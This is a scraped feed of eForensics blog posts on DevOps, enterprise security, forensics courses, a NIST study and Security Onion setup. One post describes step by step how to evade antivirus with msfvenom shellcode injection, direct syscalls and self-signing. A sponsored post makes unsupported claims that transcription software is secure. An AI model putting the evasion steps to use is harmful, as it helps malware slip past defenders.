With that being said, however, implementing DevOps within an organization, if not done correctly, can prove to be in itself an extremely tedious process. Perhaps the most natural way that we can use to explain the intricacies of DevOps integration is by comparing the process of changing the tire on a speeding car. And although that example might feel a tad bit exaggerated, it is precisely shifting to the DevOps process feels like.

In most organizations making the shift towards the integration of DevOps, management has to oversee the delivery of new software, product, and updates under tight deadlines, along with taking on additional responsibilities and learning new skills and processes. The end result of these process changes is increased business efficiency, but it’s easier said than done.

Unfortunately, however, in some instances, many organizations topple over the pressure of adjusting business processes and fail to integrate DevOps within their organizations successfully. Typically, DevOps failure within a company is rooted in the fact that key players within the organization lose control of the culture shift, which is partly because of the inability to shift and adapt to changes brought on by DevOps amalgamation.

However, taking into consideration the four essential components of successful DevOps integration, which include communication, tools, education, and leadership - organizations can ease their transition into DevOps. Furthermore, as an increasing number of companies welcome the culture shift into DevOps, it is high time that individuals come to terms with the fact that DevOps is a slow process, and requires the efforts of everyone in the organization.

In an attempt to aid our readers, we’ve compiled an article that dives into some ways through which companies can ease their DevOps transition, and consequently mediate and manage DevOps failure.

#1 - Fostering Open Communications

As the name itself suggests, DevOps relies on the effective collaboration between the Development and Operations teams - a feat that can’t be achieved if an organization does not promote open communications. At its very core, the entire ideology behind DevOps dictates that departments collaborate to fulfill the delivery of continuous updates to the end-user.

With the propagation of a culture that fosters communications, organizations can ensure that every employee - which consists of everyone from developers to customer support - fully understands their role, and the purpose of the work that they do, and how that work contributes to the DevOps cycle. Put, opening up communication allows the business to work faster, with increased agility, along with an increased focus on achieving the laid-out business goals.

On a more practical level, the best way to promote open communication within an organization, between all the departments involved in the DevOps cycle is by frequently holding meetings. Although this method might strike some as being “too typical,” it enables a platform through which scrum teams can hold open discussions with other teams, which encourages transparency and allows others to know how far the DevOps cycle is currently.

Furthermore, another way through which companies can create a workplace environment with effective and open communication is by arranging periodic touchpoints. As habit dictates, agile processes usually tend to take place in separate silos. Through scheduled touchpoints, this habit can be altered to the point where collaborating and being open about their progress becomes second nature.

Lastly, organizations can also rely on the Scaled Agile Framework (SAF), which ensures that processes are being executed in harmony across the organization’s entire framework. Moreover, utilizing product roadmaps and updates also aids in enforcing visibility and collaboration, which ultimately results in the organization providing better customer experience and improved customer satisfaction.

#2 - Educate Your Employees on the DevOps Integration

Although it is highly rare for employees to act maliciously against the best interest of their organization, as a business owner, the sooner you realize the great potential that your ‘human’ employees have to err, the better.

Similarly, when it comes to the integration of DevOps processes within an organization, one of the biggest hurdles that prevent successful implementation of DevOps has to be the employees’ resistance to undergo a culture transition from the more traditional aspect of software development to cloud-based service development.

Luckily, however, the resistance that employees display towards DevOps integration can easily be overcome through educating them. “The simplest way to do this is by explaining and educating employees about the advantages of switching to DevOps,” says Nathan Finch, a DevOps engineer at Sydney-based Aussie Web Hosting Reviews. He continues, advising that organizations should also “acutely focus on the benefits that DevOps offers to the developers.”

When it comes to educating developers, however, organizations need to adequately explain to them how their role as a developer now works in tandem with the delivery and operations development teams. Although this does imply that developers need to take on additional responsibilities as well, if you haven’t got the complete approval of your developers and an eagerness to foster collaboration- your entire DevOps integration process entirely falls apart.

#3- Utilizing the “Right” Collaboration Software

Once you’ve gone through the arduous process of promoting a workplace environment that fosters open communication, you’ll need to shift your focus to the collaborative tools that you’re going to employ within your DevOps process. Usually, most organizations rely on a tool like Slack, Microsoft Teams, and several other SaaS tools, which are growing in popularity. This richer suite of tools adds to the agility of their workflow

With the right collaborative tools at their disposal, departments in the organization can foster effective collaboration with one another, particularly as far as keeping the company-wide product roadmaps aligned goes, along with discussing some technical aspects of the DevOps cycle.

Unlike using traditional communication tools such as email and phone, which take too long to process, utilizing the proper tools ensures departments and team members that they’re working on the same page. However, we’d suggest that users rely on a combination of tools that cater best to their individual needs.

#4 - A Single Leader Overlooking the entire DevOps process can cause disruption

As important as it is for the DevOps cycle to focus on teamwork and collaboration, we’ve unfortunately seen many organizations appointing DevOps heads, which ultimately disrupts the integration process, and slows workflow rather than streamlining it.

Taking this into account, it is highly suggested that instead of placing the responsibility of overlooking a single leader, organizations work on promoting a robust DevOps culture within the workplace, ensuring that each employee fully understands the value of their role.

Rebecca James: Enthusiastic Cybersecurity Journalist, A creative team leader, editor of "virtual private network section of PrivacyCrypts".

Twitter: https://twitter.com/rebecca_jeames

The post How to Handle DevOps Failure? | By Rebecca James appeared first on eForensics.

↧

How Can Enterprises Tackle Advanced Cyberattacks? | By Rebecca James

May 13, 2020, 1:49 am

≫ Next: Android Boot Process [FREE COURSE CONTENT]

≪ Previous: How to Handle DevOps Failure? | By Rebecca James

| collaborative article |

How Can Enterprises Tackle Advanced Cyberattacks?

As the digital landscape continues to evolve and grow increasingly diverse and sophisticated, survival for enterprises and organizations depends on their ability to mediate risks and tackle cyberattacks as efficiently as possible.

Moreover, bearing witness to the fragile state of cybersecurity, as well as the monumental reach of cybercrimes today, is the fact that 2020 started with an onslaught of cyberattacks aimed at multiple organizations.

At the start of the year, foreign exchange firm Travelex was crippled by a ransomware attack, while simultaneously, reports were coming out of the U.S. state that Texas agencies were witnessing 10,000 attempted cyberattacks hailing from Iran per minute. Adding to the gravity of the situation, were reports and studies that brought forth information highlighting how unprepared most organizations and enterprises were in the face of such adversity, and how prone they were to experience more frequent and sophisticated cybercrimes in the future- mainly because they relied on outdated security strategies and practices.

If you’ve been acquainted with the cybersecurity world, however, you might be wondering about developments in the cybersecurity realms - particularly as far as the formulation of “modern” security tools is concerned, e.g. reliable antivirus applications and top-rated VPN services. Over recent years, cybersecurity specialists have worked on new cybersecurity strategies; however, the implementation and adoption of these new solutions take place at an excruciatingly slow pace, primarily because of inefficient evaluation methods.

With that being said, however, as cyberattacks increase both in complexity and frequency, organizations must seek to implement more efficient security practices, to build a robust cybersecurity infrastructure that protects an organization and its data against an arsenal of threats and vulnerabilities.

In an attempt to aid our readers, we’ve compiled an article that delves into some ways through which their organization can circumvent the threat posed by advanced cybercrimes. Before we can get into that, however, we’d like to bring our readers up to the mark regarding the tumultuous state that the cybersecurity world has been in recently.

The Growing Advances of Cybercrime

As the world welcomes technological advancements with open arms, most enterprise owners often tend to forego that cybercriminals also rely on these advancements to wreak more damage on their victims.

Most notably, however, specialists have identified the recent spiking of ransomware attacks- noting a staggering increase of 365% from Q2 2018 to Q2 2019- which speaks volumes of the monumental gaps present in the cybersecurity infrastructures of most organizations today.

One such attack, though we’ve already mentioned this above, was the Travelex ransomware attack, which was perpetrated by a group of cybercriminals known as “Sodinokibi.” Once the group had gained access to all of the foreign exchange firm’s assets, they demanded a hefty ransom of $6 million, which the company had refused to pay. The aftermath of the attack led to Travelex enduring monumental losses, while the threat of the attack retaking place lingered over their heads. Although Travelex was able to resume its services after a couple of weeks, the attack proved lethal and ultimately toppled the foreign exchange firm - which was made evident by the ripple effects that influenced several banks in the U.K.

Furthermore, the Travelex crisis also highlighted the significant pattern in modern cybercrime, which, as was made evident in the Travelex attack, tended to focus more on targeted attacks, which aimed at disrupting services, creating the perfect situation to extort large ransoms from enterprises. Moreover, these new developments in the cybercrime landscape are also supported by a study, which brought forth the discovery that these targeted attacks on small and mid-sized financial institutions could be magnified and tweaked- making them capable of toppling over major U.S banks and negatively impact a staggering 38% of the U.S. financial system.

And if that wasn’t scary enough, with statistics estimating for cybersecurity spending to amass up to a massive total of $6 trillion by 2021, the need for enterprises to devise modern cybersecurity strategies and practices to combat new threats and vulnerabilities becomes increasingly apparent. However, to gain an understanding of the present-day cybersecurity landscape, we must address the challenges that arise in the security implementation within enterprises today.

What are the Obstacles Facing Cybersecurity Implementation?

Amongst some of the most common challenges faced by organizations in the implementation of new cybersecurity practices and strategies are budget constraints, the high pressure of data security, regulations, legacy systems- along with ensuring that all of these measures are adopted timely.

In addition to the implementation hurdles of compliance and data security, a massive problem encountered by most enterprises and organizations catering to modern cybersecurity techniques is their reliance on outdated infrastructure. Simply put, the infrastructure being used in most organizations today is not equipped to deploy new cybersecurity tools. For an enterprise to make the most out of a modern security tool, its legacy systems must be compatible with the tool.

Unfortunately, despite the massive threat posed by the diverse threat landscape of today, most organizations tend to prioritize software and end up allotting the majority of their I.T. budget to the development or support of aging software - which leaves nothing for cybersecurity expenditure.

Another frequently-encountered security challenge faced by organizations in the amalgamation of modern cybersecurity tools is the risk that the evaluation of cybersecurity technology poses, particularly as far as compliance is concerned. Put, while an enterprise is in it’s a proof-of-concept (POC) or testing process, it faces the risk of compromising highly sensitive data while testing new security tools.

Moreover, this risk is amplified even further when we consider the possibility of organizations hiring third-party vendors for their testing process, who may carry malicious actors, who can leverage the PoC, as a means to infiltrate the company’s network and compromise confidential data. In an attempt to mitigate the risk posed by bad actors manipulating the PoC, strict regulations forbid the use of company/customer data to a working environment.

The strict regulations governing the testing process prevents enterprises from accurately evaluating the performance of the modern cybersecurity technology within their organization’s infrastructure, which may create further hindrances in the long run. Moreover, it is also worth mentioning that the evaluation of a cybersecurity tool is a time-consuming process, which can take up to months (maybe even years) to complete!

How Can Organizations Ease Cybersecurity Implementation?

Although the challenges facing the effective implementation of modern cybersecurity strategies and tools within organizations are incredibly cumbersome, there are still plenty of ways through which companies can ease the process and make the best out of advancements in the cybersecurity landscape.

Perhaps the best way through which organizations can pave the way for cybersecurity implementation, along with significantly improving the evaluation process, is by leveraging A.I. automation. A.I. automation mainly aids an organization in overcoming security and regulation challenges, by taking a sample of the company’s data to generate another, similar data set upon which the testing process will be conducted. Instead of conducting the PoC on actual confidential data, this AI-based technique allows the company to remain compliant with the regulation while scrutinizing the cybersecurity solutions with a more realistic dataset as well.

Furthermore, the testing process can be elevated to a further level by utilizing a cloud-based server, which equips enterprises with the liberty to run multiple PoCs simultaneously. Not only will this enable more critical analysis of the cybersecurity tech’s performance within the company’s environment, but it will also produce more time-efficient results.

For enterprises with limited resources at their disposal, who can’t afford to invest in both A.I. and cloud-based technologies, we’d suggest they consider the option of using a dedicated PoC platform, which automates the monitoring process, and minimizes the number of time-consing menial tasks. More importantly, a PoC platform is significantly cheaper than an AI-based solution while providing all the same benefits.

Conclusion

At the end of the article, we can only hope that we’ve equipped our readers with some useful steps that they can take to tackle the rapid advancements being made in cybercrime today. With that being said, useful advice that goes a long way in the cybersecurity landscape- prevention is far better than cure!

Rebecca James: Enthusiastic Cybersecurity Journalist, A creative team leader, editor of "virtual private network section of PrivacyCrypts".

Twitter: https://twitter.com/rebecca_jeames

The post How Can Enterprises Tackle Advanced Cyberattacks? | By Rebecca James appeared first on eForensics.

↧

Android Boot Process [FREE COURSE CONTENT]

May 13, 2020, 3:54 am

≫ Next: How Vulnerable Is Voice Transcription Technology To Cyber Security Threats?

≪ Previous: How Can Enterprises Tackle Advanced Cyberattacks? | By Rebecca James

In this video from our Android Mobile Forensics online course, your instructor Divya Lakshmanan will take you through the Android boot process. Understanding this element of the Android system can be crucial when analyzing a device - this video will answer all your questions!

Do you ever speculate whether your mobile phone knows more about you than your best friend? Endlessly (or rather mindlessly), we take every chance we get to peep into our screens – at work, on the subway, while standing in line or even while cooking a meal! We routinely input so much data into our phone, that a mobile phone behaviorist (likened to a human behaviorist aka psychologist), aka a proficient mobile forensics investigator, can build a healthy dossier just by waving the magic forensic wand over a mobile phone of interest.

Keeping that in mind, some mobiles devices running the Android operating system find their way into an ongoing investigation – simply because of the fact that cyber criminals cannot do without a mobile phone. This course will train you to approach an Android mobile device forensically.

Why this course?

This course is meticulously curated to teach you the continually relevant aspects of Android Mobile Forensics. In the process of doing so, you will also gain proficiency about how to replenish your forensics skills, to keep in tune with the perpetually changing Android world.

All the modules include hands-on assignments to test your newly-gained skills.

What skills will you gain?

You will learn about the intricacies involved in forensically handling an Android device.
You will be exposed to a myriad of tools available, which will give you the confidence to experiment with more tools on your own.

In the first module, you'll get the preliminary information required to perform Forensic Acquisition and Analysis of an Android Mobile. Processing an unrooted Android mobile device will be discussed.

Android Architecture
Android Boot Process
Partitioning in Android Systems
Android Incident Response
Terminology relevant to Android Forensics
Unrooted Device Analysis

Tools covered: ADB (shell, logcat, dumpsys)

Check out the rest of the modules here >>

The post Android Boot Process [FREE COURSE CONTENT] appeared first on eForensics.

↧

How Vulnerable Is Voice Transcription Technology To Cyber Security Threats?

May 14, 2020, 3:27 am

≫ Next: Simple Techniques to Bypass AVs | By Siddharth Sharma

≪ Previous: Android Boot Process [FREE COURSE CONTENT]

| sponsored post |

How Vulnerable Is Voice Transcription Technology To Cyber Security Threats?

Human beings are now less interested than ever in face to face communication. That being said, conversations that happen through a smartphone are now on the rise. It’s an interesting point to think about, but there can be some security issues that come with using a mobile phone. It doesn’t matter whether you are using voice to text, or text to speech because you need to be aware of any potential vulnerabilities.

Smartphones- The Rise of the Machine

Some people think that voice recognition arrived with the launch of the Siri feature, which came to light with the iPhone 4S. It was actually Google’s own operating system that launched this feature years ago though. Apple rolled out Siri as being one of the earliest voice assistants that could schedule your meetings and even learn about your habits. It can even give you an explanation for the meaning of life if you want. Of course, it didn’t take long for Siri to develop some personality quirks. At the end of the day, there have been some hilarious headlines but at the end of the day, there could be some security flaws.

A Serious Threat to Digital Forensics?

A lot of people are concerned because voice transcription software is often used by forensic experts. That being said, there is a clear distinction between smartphones with their own voice transcription services and the forensic industry. Forensics often use state of the art voice transcription services which are very different to the software that you’d find on your mobile phone. This software is very secure, encrypted and in no way comparable to apps or phone software like Siri.

Is Voice Transcription Dangerous for the Forensic Industry?

One thing that you need to be aware of is that voice transcription services are not dangerous. If you go through a reputable service then you will find that it is in fact, very safe. All of your data will be encrypted, and it will be very secure as well. If you are concerned about this then make sure that you ask your transcription service if they can make sure that they send your files to you in a very secure way. This alone makes voice transcription services the ideal solution if you want to try and use it to transcribe important forensic data.

What about Text to Speech?

It should be noted that text to speech is completely different to voice transcription technology. The software that you download will determine how much you are at risk. If you are not quite sure if you should be downloading software because you are not sure of the risk, then make sure that you read the terms and conditions so you can find out if your data is going to be encrypted or not.

So, voice transcription tech is not vulnerable to security threats because each software is often very, very secure. Things like Siri on the other hand can be prone to threats because so many people own an iPhone and this makes them the ideal target for criminals.

The post How Vulnerable Is Voice Transcription Technology To Cyber Security Threats? appeared first on eForensics.

↧

Simple Techniques to Bypass AVs | By Siddharth Sharma

May 20, 2020, 4:05 am

≫ Next: Security tips while playing online poker

≪ Previous: How Vulnerable Is Voice Transcription Technology To Cyber Security Threats?

Simple Techniques to Bypass AVs

AVs have been bypassed by adversaries for many years and as long as AVs exist, new techniques will continue to be developed. One of the techniques known as obfuscation is mostly being used for this purpose by attackers but there are certain other techniques as well through which we could bypass AVs/EDRs. In this blog, we will explore some of the other techniques so,

Let’s begin:

We start with a simple injection technique using CreateRemoteThread WIN user api to inject shellcode in the given remote process, below image is the code snippet:

On running the above code, it asks for a PID and then shellcode using WriteProcessMemory gets written into the address space of the given process and at last it gets executed using CreateRemoteThread api.

DEMO:

Let’s check this on VT:

Oops!! We have a good detection rate.

BYPASS

In the above code the shellcode I used was generated using msfvenom and on being injected it pops calculator in the victim PC, msfvenom has become a very popular tool being used to generate shellcodes and AVs/EDRs are well aware of it but still there are techniques which could lead to bypassing these shellcodes from AV engines.

First, we start with just removing the bad characters from our shellcode (-b “\x00\xff”) and would see what detection ratio we have on VT:

Here we go, we have two AVs (ClamAV and Cylance) which detect our injector(though i could’nt believe why only two), but still we have two enemies, so why don’t we apply another technique, the Direct-Syscall technique, simply meaning bypassing user mode api hooks which is a general behaviour of AVs for detection.

Let’s look that how the CreateRemoteThread WIN user api call goes. On doing some analysis I found that at low level CreateRemoteThread calls NtCreateThreadEx and then it all goes into kernel space as shown below:

And then:

Or simply we could see that in windbg as well by loading the executable:

Above assembly code just shows the switching of code to kernel mode, where we have a Syscall id being stored in EAX register depending the PC version we use (Win 7,8 or 10). For our case we had Win7 x64 SP1 of which Syscall ID is A5.

So now we just add .asm file to our injection project and will add the assembly code including declaration.

Modified code:

NOTE: Make sure that Microsoft Macro Assembler files are included in “Build Customizations” options.

Let’s now check the detection rate:

Okayyy we still have one detection, this time Cylance fell asleep, so let’s try one more technique against ClamAV.

Sometimes AVs flag unsigned binaries as suspicion so why not we just sign this with our own generated cert,

So for that, I just generated a code signing infrastructure and signed our binary with that cert:

Here .pfx is generated cert with which we sign our injector using signtool utility and as we can see it has been signed so let’s check this on VT again:

And here we go it’s all clear and this is how we could just bypass simple msfvenom generated shellcode, although this time ClamAV had a timeout but maybe it could detect this second time.

In future blogs we will look into the analysis and detection of how real time malwares applied these techniques on other apis to bypass or to hinder the analysis.

References:

https://github.com/j00ru/windows-syscalls

https://evasions.checkpoint.com/

https://outflank.nl/blog/

About Siddharth:

Interested in cybersecurity, his blog: https://threatblogs.wordpress.com/
Student currently pursuing bachelors of technology (Computer Science)
Interested in malware analysis,reversing and forensics.
Did internship at Computer Emergency Response Team, India (CERT-In)

The post Simple Techniques to Bypass AVs | By Siddharth Sharma appeared first on eForensics.

↧

Security tips while playing online poker

May 26, 2020, 4:17 am

≫ Next: CyberChef Walkthrough [FREE COURSE CONTENT]

≪ Previous: Simple Techniques to Bypass AVs | By Siddharth Sharma

| collaborative post |

Security tips while playing online poker

The internet is an interesting place to be and is highly enjoyable to use. There will always be, however, elements on this information superhighway that want to exploit it for more malicious purposes. This makes some internet users anxious about going online and submitting their personal details and financial information to websites such as online gaming sites. Below is a look at some of the measures you can take to protect yourself when using an online poker site so that you can enjoy the game without online security concerns preying on your mind while you do so.

Install good computer security software

If you’re going to truly protect yourself against the criminal elements out there in cyberspace, don’t go with a basic, free antivirus package. Upgrade to a stronger package that will shield you from the attacks of worms, Trojans, keyloggers, identity thieves and spammers. A solid security suite will include a firewall, which will stop someone getting onto your machine or, at least, make it a whole lot harder.

It's worth paying that subscription. The suite will receive more updates than the basic package, so your computer will be more secure to use. Don’t just update your antivirus. Download any free updates, such as Java or Adobe, for your operating system.

Of course, if you’re running a home poker tournament, you don’t have to worry as much about these sorts of measures. It’s all about having a good time and maybe winning a little money.

Research the operator

What kind of reputation does the operator have? Do some digging and find out what people are saying about them in reviews. Does the operator have a reputation for taking a long time to pay or for not paying at all? What do reviewers say about their other services?

Find out how long the operator has been running. If they’ve been running a long time, they’ll be well established and are likely to have a good reputation (and lots of reviews). Online gaming operators understand the importance of a solid reputation in their industry and work hard to cultivate it. The reviews aren’t a caste-iron guarantee that the operator is reliable, but there should be enough to confirm or dispel any doubts you might have.

Check if they ask for verification

The websites shouldn’t just be taking your money after you enter your username and password. When you make a financial transaction to play poker online, the site should ask you for verification to confirm that the person isn’t stealing your identity. If the site doesn’t ask you for valid ID, this could be a bad sign.

In the same way as platforms such as Facebook, Google and other tech giants do, the operator may do this by asking you to go through a two-step authentication process. This is likely to be a code that they send to your mobile phone first and you then have to type in.

Look for high-tech encryption on their login screen

When you log in, the website should encrypt your password and enter into a secure database to which only a small few people have access. Many operators follow a 128 or 256-bit encryption, which makes it incredibly hard for anyone unauthorized to access your data. This data protection method is the same as the banks use and the operator will have an SSL certificate if they use it. Check if they have one.

See with which banking and financial partners they’re working

Before you make any sort of deposit on the website, you should check if the operator is working with licensed vendors. Part of keeping safe in an online poker room isn’t just about playing with a secure operator, but also about one that works with secure service providers. If the third-party financial operator doesn’t offer a secure process, your precautions regarding the poker site itself won’t mean a thing. PayPal, Visa and MasterCard, for instance, are all licensed vendors and you’ll feel a little safer when you see them on the website.

Use strong passwords

Don’t use simple passwords such as “Hello”, “password” or “1234”, or your kids’ or pets’ names. Your password must consist of seven or eight characters and include symbols and numbers, not just letters, to make it strong. Password-cracking programs can also guess passwords easily if you replace letters with numbers — e.g. he110 — so you should be wary of this and make your password as original but as memorable to you as possible.

Keep your details private

Don’t tell anyone your password. Store it where no one will find it and if you have to contact the operator’s customer service team — if the site doesn’t offer a clear way to get in touch with them, it’s a red flag — then don’t reveal any details to them they don’t ask you for. Only reveal your details if it’s necessary for them to resolve your issue.

Online poker operators take a lot of care to protect their customers, by implementing data encryption, asking users for ID verification and working with trusted partners. By following the steps above, players can also make playing poker online safer for themselves and get the most out of their sessions. It can be easier to concentrate on the game when you’ve covered the security aspects of the experience.

The post Security tips while playing online poker appeared first on eForensics.

↧

CyberChef Walkthrough [FREE COURSE CONTENT]

May 27, 2020, 6:10 am

≫ Next: NIST to Digital Forensics Experts: Show Us What You Got | From NIST

≪ Previous: Security tips while playing online poker

In this short tutorial by Cordny Nederkoorn, the instructor of our MacOS Anti-Forensics course, you will learn how to use CyberChef - also known as the Cyber Swiss Army Knife! Encoding, encryption, compression, and data analysis are covered - we hope you find it interesting and find some uses for it. Let's go!

This course will give students an introduction into the exciting world of MacOS anti-forensics and its tools. For a computer forensics professional, MacOS anti-forensics is important to know, because criminals will use anti-forensics to hide or alter forensic evidence on a Windows computer, but also on a MacOS. Unfortunately, it is not well documented.

The MacOS is gaining more popularity. More people are using the MacOS, including criminals. This increases the chance of having to investigate a MacOS as criminal evidence. Criminals know this, and they will undertake measures to prevent forensic investigators from obtaining this evidence for use in court.

Besides that, it is interesting because you, as a computer forensics professional, will learn techniques used by criminals to make your work complex. This will broaden your knowledge about how a criminal thinks and operates, which will help you in your forensic investigation.

By using specific tooling, you will learn to apply anti-forensics, but also detect when it's used to hide/alter forensic evidence. This will help you choose the most suited tool in their computer forensics work to detect MacOS anti-forensics techniques.

With the knowledge you gain in this course, you will have an understanding of MacOS anti-forensics, the parts it consists of, use cases and the arms race between criminal and forensics investigators
When you have learned the skills, you will be capable of using and detecting techniques on digital evidence found on a MacOS
Given the tools described in this course, like CyberChef, SilentEye, and otthers, you will be able to use and detect techniques on digital evidence found on a MacOS
All this will give you a much needed skill in computer forensics: how to deal with anti-forensics on a MacOS

The post CyberChef Walkthrough [FREE COURSE CONTENT] appeared first on eForensics.

↧

NIST to Digital Forensics Experts: Show Us What You Got | From NIST

June 9, 2020, 1:27 am

≫ Next: EXT4 Layout [FREE COURSE CONTENT]

≪ Previous: CyberChef Walkthrough [FREE COURSE CONTENT]

NIST to Digital Forensics Experts: Show Us What You Got

First large-scale “black box” study will test the accuracy of computer and mobile phone forensics.

In forensic science, researchers use black box studies to measure the reliability of methods that rely mainly on human judgment, as opposed to methods that rely on laboratory instruments. In digital forensics, experts turn data from digital devices into information that can help an investigation.

Digital forensics experts often extract data from computers and mobile phones that may contain evidence of a crime. Now, researchers at the National Institute of Standards and Technology (NIST) will conduct the first large-scale study to measure how well those experts do their job. But rather than testing the proficiency of individual experts, the study aims to measure the performance of the digital forensics community overall.

In this study, to be conducted online, participants will examine simulated digital evidence, then answer questions that might arise in a real criminal investigation. The exercise should take about two hours, and participation is voluntary. Enrollment is now open, and the online test will be available for approximately three months.

“We want to understand the state of the practice,” said Barbara Guttman, leader of NIST’s digital forensics research program. “Can experts produce accurate and reliable information when examining data from a digital device?”

In any forensic discipline, experts can encounter difficult cases. Fingerprints can be smudged and distorted. DNA can be degraded. One challenge with digital evidence is that it can often be difficult to find key bits of evidence among large volumes of data. Also, technology changes so quickly that it can be difficult to keep up.

“Forensics experts can’t extract data perfectly in every possible scenario,” Guttman said. “Phones change. Apps change. The world just moves too fast.”

While no forensic method works perfectly all the time, researchers can measure performance within a discipline by testing the experts. For instance, researchers might show fingerprint experts a series of prints and ask whether they do or don’t match. The study designers know the correct answers, and by combining the results from many experts, they can gain insight into the reliability of the method overall.

These studies only determine whether the expert gave the correct answer, without concern for how they reached it. In other words, they treat the expert as a black box — something you cannot see inside. Researchers use black box studies to assess the reliability of methods that rely on human judgment.

“We want to understand the state of the practice. Can experts produce accurate and reliable information when extracting data from a digital device?” —Barbara Guttman, leader of NIST’s digital forensics research program

For the NIST black box study, participants will download simulated evidence from the NIST website in the form of one virtual mobile phone and one virtual computer. Such virtual devices, called “forensic images,” are commonly used in digital forensics, and study participants will be able to connect to them using the same software tools they use when working on real cases.

The forensic images created for this study simulate imagined but realistic scenarios involving a potential homicide and a potential theft of intellectual property. Study participants will download the images, examine them using whatever forensic software tools they choose, and answer a series of questions. For instance:

What software program was used to discuss a potentially illegal transaction?
What was the VIN number of the vehicle that connected to the phone via Bluetooth?
What location information can be gleaned from the photo of a black Labrador found on this device?

The study is open to all public and private sector digital examiners who conduct hard drive or mobile phone examinations as part of their official duties. NIST will not calculate the performance of any specific expert or laboratory. Instead, NIST will publish anonymized and aggregated results that show the overall performance for the expert community and different sectors within that community.

This study will fulfill a critical need identified in a landmark 2009 report by the National Academy of Sciences. Titled Strengthening Forensic Science in the United States: A Path Forward, that report called for black box studies to measure the reliability of forensic methods that rely on human judgment. Courts and jurors can then consider the results of those studies when weighing evidence. The results of this study will also provide strategic direction for future research.

This black box study is part of a larger effort to evaluate the scientific foundations of digital forensic methods. NIST is also conducting scientific foundation reviews for DNA mixtures, firearms identification and bitemark analysis.

Original link: https://www.nist.gov/news-events/news/2020/06/nist-digital-forensics-experts-show-us-what-you-got

The post NIST to Digital Forensics Experts: Show Us What You Got | From NIST appeared first on eForensics.

↧

EXT4 Layout [FREE COURSE CONTENT]

June 10, 2020, 4:01 am

≫ Next: Setting up Security Onion at home | By Z3R0th

≪ Previous: NIST to Digital Forensics Experts: Show Us What You Got | From NIST

In this video from our EXT4 File System Forensics by Divya Lakshmanan you learn all about the EXT4 layout. It's one of the first things you have to master if you plan on doing any file caeving or advanced forensics on EXT4. Let's dive in!

File System Forensics forms the root of any digital investigation process. Developing your skills in this area is sure to boost your confidence and propel you to navigate any investigation with ease. This course will make the esoteric nature of this topic coherent to a novice.

When I began exploring ext4 forensics, it piqued my curiosity. So much intricacy has gone into the development of the file system, leading to a number of forensic impacts. I conjured use cases and observed some interesting behaviour of the file system, which I would love to share with you. A lot of time is spent on processing information in bytes – which is definitely a drive down the road of patience! People usually shy away from data that is not intelligible to the average human. I will help you traverse through the world of bits and bytes in an enjoyable way. (Maybe we can communicate with aliens soon!)

Linux operating System is a ubiquitous one today. From servers, to desktops, to laptops, to tablets, to smartphones – Linux is everywhere. Underlying all that intelligent engineering is a file system that facilitates the handling of files on those devices. It is the container in any data storage device that handles file arrangement meaningfully. It is analogous to a well stacked, alphabetically sorted bookshelf. File System Forensics is the study about the existential behaviour of files on a storage device – which may undergo addition, modification or removal. One can think of it as a psychological study of the data storage container.

This course primarily deals with forensics on ext4, that is commonly used in Linux machines all over the globe. Ext4 is also found in a lot of IoT devices and in smart home devices. In the untoward occurrence of a forensic incident involving any such devices, the skills you get from this course would help you process them looking for evidence. File System Forensics is a sought-after skill in many investigative agencies. Here is your chance to become a “Forensics Yoda”!

At the end of the course:

You will know how to perform file carving on EXT4, for data recovery or forensic purposes.
You will target specific bytes of data in the ext4 file system and interpret them to gain meaningful information
You will possess the finesse to tackle bytes (zeros and ones) fearlessly within the EXT4 layout
You will add another badge to your skillset. File System Forensics is a must-know topic for every skilled digital forensic investigator

The post EXT4 Layout [FREE COURSE CONTENT] appeared first on eForensics.

↧

Setting up Security Onion at home | By Z3R0th

June 10, 2020, 7:32 am

≫ Next: Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio | By Dennis Chow

≪ Previous: EXT4 Layout [FREE COURSE CONTENT]

Setting up Security Onion at home

First off, what exactly is Security Onion and why do I care about this? From their website, it is described as: “Security Onion is a free and open source Linux distribution for intrusion detection, enterprise security monitoring, and log management. It includes Elasticsearch, Logstash, Kibana, Snort, Suricata, Bro, Wazuh, Sguil, Squert, CyberChef, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!”

Sounds awesome right? And the best part of all of this is that it’s free!

There are a couple different ways (that I know of) that you can set this up. If you have a spare computer that you don’t mind dedicating to becoming your Security Onion, or if you have a system dedicated to being an ESXI server. Luckily for you, I’ve done both!

Before we get started, it is important that you have the capability to create a SPAN port on your local network. A SPAN port, for those that don’t know is a port that is set up to mirror other ports on a switch. If you don’t have a switch and are looking to purchase one, here is what I’m currently using. You’re going to want a managed switch for this task.

Using the web console associated with the switch, I’m able to set up Port 8 as my SPAN port.

Another thing that you’ll need is at least two network interface cards (NICs) on your system. If you’re using an old computer just laying around that only has one, you can use USB NICs! When I had this set up on a spare laptop these are the ones I used.

Once you have these things you’re ready to start setting everything up! First, you have to decide which way you’re choosing to set this up.

A dedicated Security Onion computer is the easiest, but not the most beneficial in terms of losing an entire computer for one task.

Setting up ESXI is a little more daunting to most, but overall a simple process! You may be wondering, “but why can’t I set this up in Workstation Pro and virtualize it that way!?”. The simple answer is, you can. But you won’t be able to properly read traffic from throughout the network. Workstation does not allow you to properly create SPAN ports unfortunately.

Dedicated Computer Solution

For a dedicated computer solution you’re going to want to start with downloading the Security Onion ISO. Once this is complete we’re going to flash this data to our HHD/SSD. I used etcher to accomplish this.

Your device name will probably be different. Once everything is selected hit the Flash button

After this step is done we just need to install the drive back into our computer and power it on. If everything worked correctly you should be booting into Security Onion and you can begin the setup process.

ESXI Server Solution

Like the dedicated computer solution, first we need to change what our computer boots into. We’re going to boot into ESXI which can be downloaded here. You’ll have to register for an account (it’s free) and then you can download an ISO. They’ll also give you a free license key! Though, there are some limitations, but they more than likely won’t effect you. Unlike our dedicated computer installation, the ISO you download will be an installer. I would use a USB for this process, especially if you only have one HDD/SSD installed on the designated computer.

Once everything is installed for ESXI we need to configure the settings needed for Security Onion. The first thing we need to do is add another virtual switch which allows for port mirroring. Once logged in, on the left hand panel click on <networking> and then <Virtual Switches>. There should be an option to add a standard virtual switch.

Here is our virtual switch which allows for promiscuous mode. This enables us to create a SPAN port.

Once our switch is created, we need to create a port group. This is done by clicking <networking, and then <port groups>. We add a new group and assign it to the virtual switch we created in the previous step.

Our port is assigned to the SPAN vswitch and specifically allows for promiscuous mode.

